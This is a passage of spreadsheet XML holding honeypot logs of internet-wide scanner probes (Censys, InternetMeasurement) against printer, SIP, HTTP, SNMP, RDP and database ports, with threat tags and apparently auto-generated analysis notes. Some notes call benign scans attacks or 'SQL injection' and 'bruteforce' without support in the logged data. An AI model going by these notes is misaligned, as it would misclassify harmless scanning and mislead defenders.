&lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=60173'}}&amp;&amp;{Data_HTTPS:{'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,46360)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.40.123:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,60360)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.136.113:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=58537'}}&amp;&amp;{Data_HTTPS:{'Host': '154.90.63.129:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=48766'}}&amp;&amp;{Data_HTTP:{'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.182.38.84:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.182.38.84:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=45844'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,48786)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '94.131.113.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.113.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=57666'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.180.55.39:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=51613'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://45.14.244.111:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.253.40.123:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.171.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}</t>
  </si>
  <si>
    <t>::ffff:a75e:8ab6</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit various services on a network, likely as part of a reconnaissance and lateral movement phase in a larger attack campaign. They are probing for open ports and vulnerable systems to gain access and potentially escalate privileges. &amp;&amp; No FTP activity detected. No malicious behavior related to FTP services found. Normal system operation. &amp;&amp; No IRC (Internet Relay Chat) activity detected, which may indicate an attempt to use this service for malicious purposes was thwarted. This lack of activity could also imply the attacker did not try to use IRC at all or was unable to connect. Malicious actors often rely on covert communication channels. &amp;&amp; The data suggests that an attempt was made to access the service, but it could not gather any information due to lack of configuration or implementation for LDAP functionality. This might indicate a probing activity from an attacker trying to understand the system's capabilities. The service appears to be non-operational for LDAP purposes. &amp;&amp; Possible SQL injection attempt detected, as the MySQL service is being queried but no actual data is returned. This could indicate an attacker trying to extract or manipulate sensitive information. The absence of returned data may be a sign of an injection attack. &amp;&amp; Unsuccessful login attempts detected for Oracle database services.
Malicious actors are trying to access sensitive information.
This could be part of a larger attack targeting database vulnerabilities. &amp;&amp; A request is made to the website from an IP address, likely as part of a scan or reconnaissance by an automated tool called CensysInspect, attempting to gather information about the server. The user agent string suggests this is not a legitimate browser. This could be the first step in a larger malicious activity. &amp;&amp; This log data suggests a potential reconnaissance scan, where an attacker is gathering information about the system's services and configuration. The user agent indicates it may be a scripted tool or scanning software, rather than a genuine browser. The GET request to the root directory may be an attempt to determine if any specific services are exposed. &amp;&amp; A GET request is being made to a specific URI on the system, possibly attempting to retrieve information or execute malicious code. The User-Agent field contains a suspicious string that may be used for impersonation or identification purposes. This activity could be part of reconnaissance or an initial attack vector. &amp;&amp; A GET request was made to a web server for a favicon, likely as part of reconnaissance or scanning activity. The user-agent string is from CensysInspect, a tool used by security researchers and attackers alike. This may indicate probing for vulnerabilities or testing network exposure.</t>
  </si>
  <si>
    <t>Port scanning and enumeration &amp;&amp; LDAP Bruteforce &amp;&amp; Web Scanning &amp;&amp; Scanning GET</t>
  </si>
  <si>
    <t>91b45221fee560b804fbed326e050a07</t>
  </si>
  <si>
    <t>198.235.24.158</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_FTP_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;21&amp;&amp;9100&amp;&amp;143&amp;&amp;3306&amp;&amp;5432&amp;&amp;43159&amp;&amp;5900&amp;&amp;1521&amp;&amp;1433&amp;&amp;389&amp;&amp;23&amp;&amp;161&amp;&amp;49523&amp;&amp;54772&amp;&amp;110&amp;&amp;6379&amp;&amp;53757</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:189e</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit vulnerabilities in various services, likely as part of a reconnaissance phase or a larger malicious campaign. They are using scripts to automate the scanning process and try to bypass security measures.</t>
  </si>
  <si>
    <t xml:space="preserve"> Credential harvesting and authentication attempts via different protocols like FTP, HTTP, HTTPS, LDAP, MSSQL, MYSQL, POP3, RDP, SMB, SMTP, SNMP, etc. &amp;&amp; Scanning Probe</t>
  </si>
  <si>
    <t>ae7f2bf4b6369e63cc31491a4c2b784d</t>
  </si>
  <si>
    <t>185.247.137.137</t>
  </si>
  <si>
    <t>NA&amp;&amp;centered.monitoring.internet-measurement.com</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_SOCKS5_H8</t>
  </si>
  <si>
    <t>389&amp;&amp;443&amp;&amp;6379&amp;&amp;21&amp;&amp;1080&amp;&amp;6667&amp;&amp;5432&amp;&amp;3306&amp;&amp;46891&amp;&amp;1521&amp;&amp;25&amp;&amp;143&amp;&amp;23&amp;&amp;NA&amp;&amp;110&amp;&amp;9100&amp;&amp;1433&amp;&amp;3389&amp;&amp;43381&amp;&amp;41813&amp;&amp;445</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;NA&amp;&amp;query&amp;&amp;login&amp;&amp;stshash&amp;&amp;request&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.116.162:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'hvnjlpdf', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.137;tag=hvnjlpdf', 'max-forwards': '0', 'to': 'sip:103.113.68.70', 'via': 'SIP/2.0/UDP 185.247.137.137:5060;branch=z9hG4bKhvnjlpdf;received=185.247.137.137;rport=44424'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'lrpqistn', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.137;tag=lrpqistn', 'max-forwards': '0', 'to': 'sip:185.255.123.181', 'via': 'SIP/2.0/UDP 185.247.137.137:5060;branch=z9hG4bKlrpqistn;received=185.247.137.137;rport=47787'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.117.64:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.137,59239)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 154.26.156.60:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.4.48.242:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.60.171.39:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:b9f7:8989</t>
  </si>
  <si>
    <t>This log data indicates that there is currently no information available about any detected malicious activity. There are no logs indicating any suspicious connections or attempts to exploit vulnerabilities. The system has not captured any relevant activity yet. &amp;&amp; Possible malicious activity: Attempts to access Redis service without specifying any data, potentially probing for vulnerabilities or testing accessibility. This behavior may indicate reconnaissance or initial exploitation steps by an attacker. The lack of data suggests a check for presence rather than actual data transmission.</t>
  </si>
  <si>
    <t>184dd36f8c2652a6ef4e694c5f3bb7e8</t>
  </si>
  <si>
    <t>147.185.132.222</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_HTTP_H36&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SIP_H4&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_POSTGRES_H20&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_MSSQL_H41</t>
  </si>
  <si>
